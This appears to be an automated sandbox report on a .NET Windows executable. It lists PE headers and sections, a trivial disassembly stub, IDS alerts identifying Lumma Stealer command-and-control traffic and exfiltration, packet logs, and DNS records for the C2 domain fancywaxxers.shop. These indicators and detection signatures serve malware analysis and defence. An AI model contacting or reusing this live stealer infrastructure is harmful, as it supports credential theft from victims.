jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa470	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa422	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84c4	0x8600	e05f1acca24b974a8126be170dff517b	False	0.5043726679104478	data	5.950953039580874	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x242	0x400	14d8e51a66bfa2cb04d0bad62fb2e968	False	0.3037109375	data	3.5160679793070893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	15941323991b3ba9288d6bda059fba10	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x10000	0x51600	0x51600	b7160c756eaff299501b4b3513377cb2	False	1.000333021313364	data	7.999375972304333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:40:58.597126+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.4	54217	1.1.1.1	53	UDP
2025-01-05T19:40:59.108516+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:40:59.108516+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:40:59.744568+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:40:59.744568+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:41:00.236523+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:00.236523+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:00.750160+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:00.750160+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:01.655742+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49734	104.21.32.1	443	TCP
2025-01-05T19:41:01.655742+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.32.1	443	TCP
2025-01-05T19:41:02.758603+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-05T19:41:02.758603+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-05T19:41:03.792134+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49739	104.21.32.1	443	TCP
2025-01-05T19:41:03.792134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.32.1	443	TCP
2025-01-05T19:41:05.167559+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49741	104.21.32.1	443	TCP
2025-01-05T19:41:05.167559+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.32.1	443	TCP
2025-01-05T19:41:05.671560+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49741	104.21.32.1	443	TCP
2025-01-05T19:41:06.604372+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49742	104.21.32.1	443	TCP
2025-01-05T19:41:06.604372+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.32.1	443	TCP
2025-01-05T19:41:08.742208+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49743	104.21.32.1	443	TCP
2025-01-05T19:41:08.742208+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.32.1	443	TCP
2025-01-05T19:41:09.245583+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	104.21.32.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:40:58.619548082 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:58.619597912 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:58.619693041 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:58.625873089 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:58.625893116 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.108448982 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.108515978 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.114108086 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.114120960 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.114346981 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.160940886 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.322251081 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.322278976 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.322423935 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.744604111 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.744702101 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.744756937 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.746318102 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.746336937 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.746354103 CET	49730	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.746361017 CET	443	49730	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.753642082 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.753680944 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:40:59.753753901 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.753985882 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:40:59.753999949 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.236445904 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.236522913 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.237802029 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.237812042 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.238017082 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.246598959 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.246705055 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.246742010 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750166893 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750226021 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750252962 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750279903 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750300884 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750304937 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.750324011 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750348091 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.750370026 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.750391960 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750695944 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.750752926 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.750760078 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.757256031 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.757304907 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.757312059 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.803469896 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.841412067 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.841509104 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.841541052 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.841624022 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.841634035 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.841646910 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.841679096 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.841711998 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.862356901 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.862369061 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:00.862377882 CET	49732	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:00.862384081 CET	443	49732	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.068306923 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.068332911 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.068423986 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.068828106 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.068846941 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.655653954 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.655741930 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.657099009 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.657109976 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.657382965 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.664968014 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.665174007 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.665215015 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:01.665278912 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:01.665286064 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.275646925 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.275755882 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.275847912 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.283237934 CET	49734	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.283255100 CET	443	49734	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.301115990 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.301148891 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.301254034 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.301533937 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.301544905 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.758512974 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.758603096 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.759874105 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.759881973 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.760112047 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:02.761324883 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.761467934 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:02.761495113 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.234091043 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.234191895 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.234270096 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.234435081 CET	49738	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.234451056 CET	443	49738	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.329884052 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.329931974 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.330163002 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.333792925 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.333810091 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.792046070 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.792134047 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.858275890 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.858319998 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.858629942 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.884903908 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.886104107 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.886142015 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:03.886230946 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:03.886248112 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:04.560380936 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:04.560463905 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:04.560529947 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:04.560774088 CET	49739	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:04.560798883 CET	443	49739	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:04.679930925 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:04.679987907 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:04.680061102 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:04.680412054 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:04.680423975 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.167448044 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.167558908 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.168931961 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.168941975 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.169145107 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.181406021 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.181550026 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.181562901 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.671566010 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.671658993 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:05.671948910 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.672190905 CET	49741	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:05.672214031 CET	443	49741	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.111618042 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.111670971 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.111728907 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.112200022 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.112215996 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.604283094 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.604372025 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.621189117 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.621212959 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.621453047 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.642416000 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656039953 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656081915 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656207085 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656239033 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656337023 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656362057 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656474113 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656506062 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656639099 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656670094 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656807899 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656835079 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656842947 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.656852007 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.656980038 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.657006025 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.657030106 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.657156944 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.657186985 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.661475897 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.661690950 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.661719084 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:06.661742926 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.661783934 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:06.671360016 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.275064945 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.275156021 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.275226116 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.275403976 CET	49742	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.275419950 CET	443	49742	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.279576063 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.279616117 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.279720068 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.279974937 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.279983997 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.742079020 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.742208004 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.743419886 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.743428946 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.743628979 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:08.744741917 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.744791985 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:08.744801044 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245593071 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245646000 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245678902 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245711088 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245716095 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.245733023 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245748043 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.245768070 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245800972 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245805979 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.245810986 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.245845079 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.245850086 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.246083975 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.246126890 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.246133089 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.246340990 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.246388912 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.257949114 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.257966995 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:09.257999897 CET	49743	443	192.168.2.4	104.21.32.1
Jan 5, 2025 19:41:09.258006096 CET	443	49743	104.21.32.1	192.168.2.4
Jan 5, 2025 19:41:41.887747049 CET	53944	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:41:41.892594099 CET	53	53944	162.159.36.2	192.168.2.4
Jan 5, 2025 19:41:41.892676115 CET	53944	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:41:41.897521973 CET	53	53944	162.159.36.2	192.168.2.4
Jan 5, 2025 19:41:42.366027117 CET	53944	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:41:42.371054888 CET	53	53944	162.159.36.2	192.168.2.4
Jan 5, 2025 19:41:42.371110916 CET	53944	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:40:58.597126007 CET	54217	53	192.168.2.4	1.1.1.1
Jan 5, 2025 19:40:58.611097097 CET	53	54217	1.1.1.1	192.168.2.4
Jan 5, 2025 19:41:41.887057066 CET	53	50571	162.159.36.2	192.168.2.4
Jan 5, 2025 19:41:42.381479025 CET	53	54471	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:40:58.597126007 CET	192.168.2.4	1.1.1.1	0x6f9a	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
